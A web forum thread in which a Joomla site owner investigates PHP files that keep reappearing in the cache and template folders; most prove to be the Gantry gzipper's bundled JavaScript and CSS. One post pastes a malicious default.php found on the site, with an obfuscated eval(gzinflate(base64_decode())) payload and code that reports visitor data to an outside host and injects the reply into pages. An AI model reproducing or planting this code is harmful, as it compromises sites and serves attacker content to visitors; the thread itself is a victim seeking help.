php file in joomla cache folder ???
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
the following file keeps appearing in one of my joomla sites
(running joomla 259) (running juxta)
it must be malicious because the other sites using the same template do not have it, is there anyway possible to figure out where it is coming from.........when I delete it, it comes back within seconds
I have already changed joomla pw and pw/directory on the admin section, checked file/folder permissions, some were unacceptable, which were changed from original.....changed ftp pw on server
I've uninstalled gantry & reinstalled fresh new file.
ANY IDEAS????????????/
Here is the file info:
FILE NAME:
js-4d561b7d6ecdf37c4561ec598dcd387a.php
contents of the file:
<?php
ob_start ("ob_gzhandler");
header("Content-type: application/x-javascript; charset: UTF-8");
header("Cache-Control: must-revalidate");
$expires_time = 1440;
$offset = 60 * $expires_time ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
/*** gantry-buildspans.js ***/
/*
* @author RocketTheme www.rockettheme.com
* @copyright Copyright (C) 2007 - 2013 RocketTheme, LLC
* @license www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
var GantryBuildSpans=function(b,c,a){(b.length).times(function(e){var f="."+b[e];var d=function(j){j.setStyle("visibility","visible");var
i=j.get("text");
var g=i.split(" ");first=g[0];rest=g.slice(1).join(" ");html=j.innerHTML;if(rest.length>0){var k=j.clone().set("text"," "+rest),h=new Element
("span").set("text",first);
h.inject(k,"top");k.replaces(j);}};$$(f).each(function(g){c.each(function(h){g.getElements(h).each(function(j){var i=j.getFirst();if(i&&i.get
("tag")=="a"){d(i);
}else{d(j);}});});});});};
;
/*** browser-engines.js ***/
/*
* @author RocketTheme www.rockettheme.com
* @copyright Copyright (C) 2007 - 2013 RocketTheme, LLC
* @license www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
if(!Browser.Engine){if(Browser.Platform.ios){Browser.Platform.ios=true;}Browser.Engine={};var setEngine=function(b,a)
{Browser.Engine.name=b;Browser.Engine[b+a]=true;
Browser.Engine.version=a;};if(Browser.ie){Browser.ie=true;switch(Browser.version){case 6:setEngine("trident",4);break;case 7:setEngine
("trident",5);break;
case 8:setEngine("trident",6);}}if(Browser.firefox){Browser.firefox=true;if(Browser.version>=3){setEngine("gecko",19);}else{setEngine
("gecko",18);}}if(Browser.safari||Browser.chrome){Browser.safari=true;
switch(Browser.version){case 2:setEngine("webkit",419);break;case 3:setEngine("webkit",420);break;case 4:setEngine("webkit",525);}}if
(Browser.opera){Browser.opera=true;
if(Browser.version>=9.6){setEngine("presto",960);}else{if(Browser.version>=9.5){setEngine("presto",950);}else{setEngine("presto",925);}}}if
(Browser.name=="unknown"){switch((ua.match(/(?:webkit|khtml|gecko)/)||[])[0]){case"webkit":case"khtml":Browser.safari=true;
break;case"gecko":Browser.firefox=true;}}}
;
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
in addition after a lil while another file jumps in the cache folder
here it is:
FILENAME:
js-f3ac5b615c3de43462568c1f9214e46f.php
contents of file:
<?php
ob_start ("ob_gzhandler");
header("Content-type: application/x-javascript; charset: UTF-8");
header("Cache-Control: must-revalidate");
$expires_time = 1440;
$offset = 60 * $expires_time ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
/*** gantry-ie6warn.js ***/
/*
* @author RocketTheme www.rockettheme.com
* @copyright Copyright (C) 2007 - 2013 RocketTheme, LLC
* @license www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
var RokIEWarn=new Class({site:"sitename",initialize:function(f){var d=f;this.box=new Element("div",{id:"iewarn"}).inject(document.body,"top");var g=new Element("div").inject(this.box).set("html",d);
var e=this.toggle.bind(this);var c=new Element("a",{id:"iewarn_close"}).addEvents({mouseover:function(){this.addClass("cHover");},mouseout:function(){this.removeClass("cHover");
},click:function(){e();}}).inject(g,"top");this.height=document.id("iewarn").getSize().y;this.fx=new Fx.Morph(this.box,{duration:1000}).set({top:document.id("iewarn").getStyle("top").toInt()});
this.open=false;var b=Cookie.read("rokIEWarn"),a=this.height;if(!b||b=="open"){this.show();}else{this.fx.set({top:-a});}return;},show:function(){this.fx.start({top:0});
this.open=true;Cookie.write("rokIEWarn","open",{duration:7});},close:function(){var a=this.height;this.fx.start({top:-a});this.open=false;Cookie.write("rokIEWarn","close",{duration:7});
},status:function(){return this.open;},toggle:function(){if(this.open){this.close();}else{this.show();}}});
;
/*** belated-png.js ***/
/*
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: This email address is being protected from spambots. You need JavaScript enabled to view it.
* URL: www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD_belatedPNG.fix('.png_bg'); // argument is a CSS selector
* DD_belatedPNG.fixPng( someNode ); // argument is an HTMLDomElement
*/
var DD_belatedPNG={ns:"DD_belatedPNG",imgSize:{},delay:10,nodesFixed:0,createVmlNameSpace:function(){if(document.namespaces&&!document.namespaces[this.ns]){document.namespaces.add(this.ns,"urn:schemas-microsoft-com:vml");
}},createVmlStyleSheet:function(){var c,d;c=document.createElement("style");c.setAttribute("media","screen");document.documentElement.firstChild.insertBefore(c,document.documentElement.firstChild.firstChild);
if(c.styleSheet){c=c.styleSheet;c.addRule(this.ns+"\\:*","{behavior:url(#default#VML)}");c.addRule(this.ns+"\\:shape","position:absolute;");c.addRule("img."+this.ns+"_sizeFinder","behavior:none; border:none; position:absolute; z-index:-1; top:-10000px; visibility:hidden;");
this.screenStyleSheet=c;d=document.createElement("style");d.setAttribute("media","print");document.documentElement.firstChild.insertBefore(d,document.documentElement.firstChild.firstChild);
d=d.styleSheet;d.addRule(this.ns+"\\:*","{display: none !important;}");d.addRule("img."+this.ns+"_sizeFinder","{display: none !important;}");}},readPropertyChange:function(){var d,f,e;
d=event.srcElement;if(!d.vmlInitiated){return;}if(event.propertyName.search("background")!=-1||event.propertyName.search("border")!=-1){DD_belatedPNG.applyVML(d);
}if(event.propertyName=="style.display"){f=(d.currentStyle.display=="none")?"none":"block";for(e in d.vml){if(d.vml.hasOwnProperty(e)){d.vml[e].shape.style.display=f;
}}}if(event.propertyName.search("filter")!=-1){DD_belatedPNG.vmlOpacity(d);}},vmlOpacity:function(c){if(c.currentStyle.filter.search("lpha")!=-1){var d=c.currentStyle.filter;
d=parseInt(d.substring(d.lastIndexOf("=")+1,d.lastIndexOf(")")),10)/100;c.vml.color.shape.style.filter=c.currentStyle.filter;c.vml.image.fill.opacity=d;
}},handlePseudoHover:function(b){setTimeout(function(){DD_belatedPNG.applyVML(b);},1);},fix:function(e){if(this.screenStyleSheet){var f,d;f=e.split(",");
for(d=0;d<f.length;d++){this.screenStyleSheet.addRule(f[d],"behavior:expression(DD_belatedPNG.fixPng(this))");}}},applyVML:function(b){b.runtimeStyle.cssText="";
this.vmlFill(b);this.vmlOffsets(b);this.vmlOpacity(b);if(b.isImg){this.copyImageBorders(b);}},attachHandlers:function(h){var m,n,j,l,a,k;m=this;n={resize:"vmlOffsets",move:"vmlOffsets"};
if(h.nodeName=="A"){l={mouseleave:"handlePseudoHover",mouseenter:"handlePseudoHover",focus:"handlePseudoHover",blur:"handlePseudoHover"};for(a in l){if(l.hasOwnProperty(a)){n[a]=l[a];
}}}for(k in n){if(n.hasOwnProperty(k)){j=function(){m[n[k]](h);};h.attachEvent("on"+k,j);}}h.attachEvent("onpropertychange",this.readPropertyChange);},giveLayout:function(b){b.style.zoom=1;
if(b.currentStyle.position=="static"){b.style.position="relative";}},copyImageBorders:function(d){var f,e;f={borderStyle:true,borderWidth:true,borderColor:true};
for(e in f){if(f.hasOwnProperty(e)){d.vml.color.shape.style[e]=d.currentStyle[e];}}},vmlFill:function(l){if(!l.currentStyle){return;}else{var m,k,j,h,i,n;
m=l.currentStyle;}for(h in l.vml){if(l.vml.hasOwnProperty(h)){l.vml[h].shape.style.zIndex=m.zIndex;}}l.runtimeStyle.backgroundColor="";l.runtimeStyle.backgroundImage="";
k=true;if(m.backgroundImage!="none"||l.isImg){if(!l.isImg){l.vmlBg=m.backgroundImage;l.vmlBg=l.vmlBg.substr(5,l.vmlBg.lastIndexOf('")')-5);}else{l.vmlBg=l.src;
}j=this;if(!j.imgSize[l.vmlBg]){i=document.createElement("img");j.imgSize[l.vmlBg]=i;i.className=j.ns+"_sizeFinder";i.runtimeStyle.cssText="behavior:none; position:absolute; left:-10000px; top:-10000px; border:none; margin:0; padding:0;";
n=function(){this.width=this.offsetWidth;this.height=this.offsetHeight;j.vmlOffsets(l);};i.attachEvent("onload",n);i.src=l.vmlBg;i.removeAttribute("width");
i.removeAttribute("height");document.body.insertBefore(i,document.body.firstChild);}l.vml.image.fill.src=l.vmlBg;k=false;}l.vml.image.fill.on=!k;l.vml.image.fill.color="none";
l.vml.color.shape.style.backgroundColor=m.backgroundColor;l.runtimeStyle.backgroundImage="none";l.runtimeStyle.backgroundColor="transparent";},vmlOffsets:function(x){var t,b,y,w,u,c,v,o,q,s,p;
t=x.currentStyle;b={W:x.clientWidth+1,H:x.clientHeight+1,w:this.imgSize[x.vmlBg].width,h:this.imgSize[x.vmlBg].height,L:x.offsetLeft,T:x.offsetTop,bLW:x.clientLeft,bTW:x.clientTop};
y=(b.L+b.bLW==1)?1:0;w=function(a,g,f,h,e,d){a.coordsize=h+","+e;a.coordorigin=d+","+d;a.path="m0,0l"+h+",0l"+h+","+e+"l0,"+e+" xe";a.style.width=h+"px";
a.style.height=e+"px";a.style.left=g+"px";a.style.top=f+"px";};w(x.vml.color.shape,(b.L+(x.isImg?0:b.bLW)),(b.T+(x.isImg?0:b.bTW)),(b.W-1),(b.H-1),0);w(x.vml.image.shape,(b.L+b.bLW),(b.T+b.bTW),(b.W),(b.H),1);
u={X:0,Y:0};if(x.isImg){u.X=parseInt(t.paddingLeft,10)+1;u.Y=parseInt(t.paddingTop,10)+1;}else{for(q in u){if(u.hasOwnProperty(q)){this.figurePercentage(u,b,q,t["backgroundPosition"+q]);
}}}x.vml.image.fill.position=(u.X/b.W)+","+(u.Y/b.H);c=t.backgroundRepeat;v={T:1,R:b.W+y,B:b.H,L:1+y};o={X:{b1:"L",b2:"R",d:"W"},Y:{b1:"T",b2:"B",d:"H"}};
if(c!="repeat"||x.isImg){s={T:(u.Y),R:(u.X+b.w),B:(u.Y+b.h),L:(u.X)};if(c.search("repeat-")!=-1){p=c.split("repeat-")[1].toUpperCase();s[o[p].b1]=1;s[o[p].b2]=b[o[p].d];
}if(s.B>b.H){s.B=b.H;}x.vml.image.shape.style.clip="rect("+s.T+"px "+(s.R+y)+"px "+s.B+"px "+(s.L+y)+"px)";}else{x.vml.image.shape.style.clip="rect("+v.T+"px "+v.R+"px "+v.B+"px "+v.L+"px)";
}},figurePercentage:function(k,l,i,h){var g,j;j=true;g=(i=="X");switch(h){case"left":case"top":k=0;break;case"center":k=0.5;break;case"right":case"bottom":k=1;
break;default:if(h.search("%")!=-1){k=parseInt(h,10)/100;}else{j=false;}}k=Math.ceil(j?((l[g?"W":"H"]*k)-(l[g?"w":"h"]*k)):parseInt(h,10));
if(k%2===0){k++;}return k;},fixPng:function(l){l.style.behavior="none";var i,e,j,h,k;if(l.nodeName=="BODY"||l.nodeName=="TD"||l.nodeName=="TR"){return;
}l.isImg=false;if(l.nodeName=="IMG"){if(l.src.toLowerCase().search(/\.png$/)!=-1){l.isImg=true;l.style.visibility="hidden";}else{return;}}else{if(l.currentStyle.backgroundImage.toLowerCase().search(".png")==-1){return;
}}i=DD_belatedPNG;l.vml={color:{},image:{}};e={shape:{},fill:{}};for(h in l.vml){if(l.vml.hasOwnProperty(h)){for(k in e){if(e.hasOwnProperty(k)){j=i.ns+":"+k;
l.vml[h][k]=document.createElement(j);}}l.vml[h].shape.stroked=false;l.vml[h].shape.appendChild(l.vml[h].fill);l.parentNode.insertBefore(l.vml[h].shape,l);
}}l.vml.image.shape.fillcolor="none";l.vml.image.fill.type="tile";l.vml.color.fill.on=false;i.attachHandlers(l);i.giveLayout(l);i.giveLayout(l.offsetParent);
l.vmlInitiated=true;i.applyVML(l);}};try{document.execCommand("BackgroundImageCache",false,true);}catch(r){}DD_belatedPNG.createVmlNameSpace();DD_belatedPNG.createVmlStyleSheet();
/*** gantry-buildspans.js ***/
/*
* @author RocketTheme www.rockettheme.com
* @copyright Copyright (C) 2007 - 2013 RocketTheme, LLC
* @license www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
var GantryBuildSpans=function(b,c,a){(b.length).times(function(e){var f="."+b[e];var d=function(j){j.setStyle("visibility","visible");var i=j.get("text");
var g=i.split(" ");first=g[0];rest=g.slice(1).join(" ");html=j.innerHTML;if(rest.length>0){var k=j.clone().set("text"," "+rest),h=new Element("span").set("text",first);
h.inject(k,"top");k.replaces(j);}};$$(f).each(function(g){c.each(function(h){g.getElements(h).each(function(j){var i=j.getFirst();if(i&&i.get("tag")=="a"){d(i);
}else{d(j);}});});});});};
;
/*** browser-engines.js ***/
/*
* @author RocketTheme www.rockettheme.com
* @copyright Copyright (C) 2007 - 2013 RocketTheme, LLC
* @license www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
if(!Browser.Engine){if(Browser.Platform.ios){Browser.Platform.ios=true;}Browser.Engine={};var setEngine=function(b,a){Browser.Engine.name=b;Browser.Engine[b+a]=true;
Browser.Engine.version=a;};if(Browser.ie){Browser.ie=true;switch(Browser.version){case 6:setEngine("trident",4);break;case 7:setEngine("trident",5);break;
case 8:setEngine("trident",6);}}if(Browser.firefox){Browser.firefox=true;if(Browser.version>=3){setEngine("gecko",19);}else{setEngine("gecko",18);}}if(Browser.safari||Browser.chrome){Browser.safari=true;
switch(Browser.version){case 2:setEngine("webkit",419);break;case 3:setEngine("webkit",420);break;case 4:setEngine("webkit",525);}}if(Browser.opera){Browser.opera=true;
if(Browser.version>=9.6){setEngine("presto",960);}else{if(Browser.version>=9.5){setEngine("presto",950);}else{setEngine("presto",925);}}}if(Browser.name=="unknown"){switch((ua.match(/(?:webkit|khtml|gecko)/)||[])[0]){case"webkit":case"khtml":Browser.safari=true;
break;case"gecko":Browser.firefox=true;}}}
;
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
sourceview shows this in the head
4th script up from bottom
<script src="/media/system/js/mootools-core.js" type="text/javascript"></script>
<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/mootools-more.js" type="text/javascript"></script>
<script src=" ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js " type="text/javascript"></script>
<script src="/media/plg_jblibrary/jquery/jquery.noconflict.js" type="text/javascript"></script>
<script src="/media/plg_jblibrary/jquery/jquery.lazyload.js" type="text/javascript"></script>
<script src="/media/system/js/modal.js" type="text/javascript"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js" type="text/javascript"></script>
<script src="/media/k2/assets/js/k2.noconflict.js" type="text/javascript"></script>
<script src="/components/com_k2/js/k2.js" type="text/javascript"></script>
<script src="/plugins/system/rokbox/rokbox.js" type="text/javascript"></script>
<script src="/plugins/system/rokbox/themes/light/rokbox-config.js" type="text/javascript"></script>
<script src="/cache/js-4d561b7d6ecdf37c4561ec598dcd387a.php" type="text/javascript"></script>
<script src="/modules/mod_roknavmenu/themes/fusion/js/fusion.js" type="text/javascript"></script>
<script src="/modules/mod_slideshow3/slideshow/jquery.cycle.lite.js" type="text/javascript"></script>
<script type="text/javascript">
window.addEvent('domready', function() {
SqueezeBox.initialize({});
SqueezeBox.assign($$('a.modal'), {
parse: 'rel'
});
});
var K2SitePath = '/';
var rokboxPath = '/plugins/system/rokbox/';
window.addEvent('domready', function() {
var modules = ;
var header = ;
GantryBuildSpans(modules, header);
});
window.addEvent('domready', function() {
new Fusion('ul.menutop', {
pill: 0,
effect: 'slide',
opacity: 1,
hideDelay: 500,
centered: 0,
tweakInitial: {'x': 0, 'y': 0},
tweakSubsequent: {'x': 0, 'y': 0},
menuFx: {duration: 400, transition: Fx.Transitions.Quad.easeOut},
pillFx: {duration: 400, transition: Fx.Transitions.Back.easeOut}
});
});
</script>
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
aw....... I think the gantry gzipper is doing this
turned it off and it's been 5 minutes and the file has not come back
The reason I was so concerned about this is because I found a default.php in the joomla website, all in different folders including the cache folder..........so was trying to find a source
the default.php was causing an error in my browser, it wanted to run some java
here is a copy of the file:
is it possible the gantry gzipper was involved or used to help this file
<?php
>>> eval(gzinflate(base64_decode("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")));
>>> ?><?php
>>> if (!isset($sRetry))
>>> {
>>> global $sRetry;
>>> $sRetry = 1;
>>> // This code use for global bot statistic
>>> $sUserAgent = strtolower($_SERVER); // Looks
>>> for google serch bot
>>> $stCurlHandle = NULL;
>>> $stCurlLink = "";
>>> if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent,
>>> 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') ==
>>> false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent,
>>> 'opera') == false)&&(strstr($sUserAgent, 'chrome') ==
>>> false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent,
>>> 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot
>>> comes
>>> {
>>> if(isset($_SERVER) == true &&
>>> isset($_SERVER) == true){ // Create bot analitics
>>> $stCurlLink = base64_decode(
>>> 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER).'&fullpath='.urlencode($_SERVER).'&check='.isset($_GET);
>>> @$stCurlHandle = curl_init( $stCurlLink );
>>> }
>>> }
>>> if ( $stCurlHandle !== NULL )
>>> {
>>> curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
>>> curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
>>> $sResult = @curl_exec($stCurlHandle);
>>> if ($sResult[0]=="O")
>>> {$sResult[0]=" ";
>>> echo $sResult; // Statistic code end
>>> }
>>> curl_close($stCurlHandle);
>>> }
>>> }
>>> ?>
>>
>
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
ok, a NEW php file showed up today in the cache file
and the gantry gzipper is still off
guess I'll start dissecting again
thanks for input - if any one is experiencing the same, please jump in
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
I haven't found anymore default.php files on the site, but pretty sure the files that keep jumping in the cache folder are going to trigger that default.php file to show up some time or another.
headed back to joomla's forum to follow Leo's suggestions
-
-
-
- debrab
- Newbie
- Posts: 17
- Thanks: 0
-
went back to review juxta template and gantry files
found 11 php files in the templates css folder
here is the content of one of them, each file appears to be basically the same just different file names and they all contain the beginning script
FILENAME:
css-b87aef5250ee7db5863c5140e4773067.php
CONTENTS:
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$expires_time = 1440;
$offset = 60 * $expires_time ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>
/*** style1.css ***/
body, #rt-header, #rt-bottom, #rt-footer, #rt-copyright, legend {color: #654106;}a:hover, a:link {color: #000000;text-decoration: none;font-weight: bold} .button:hover {color: #333;}.menutop li.root > .item, .menu-type-splitmenu .menutop li .item {color: #654106;text-shadow: 1px 1px 1px #fff;}.menutop li.root.active > .item, .menutop li.root.active > .item:hover, .menu-type-splitmenu .menutop li.active .item, .menu-type-splitmenu .menutop li.active:hover .item, .menutop li.root.active.f-mainparent-itemfocus > .item {color: #fff;text-shadow: -1px -1px 1px #333;}.menutop li.root:hover > .item, .menutop li.root.f-mainparent-itemfocus > .item, .menu-type-
-
Time to create page: 0.083 seconds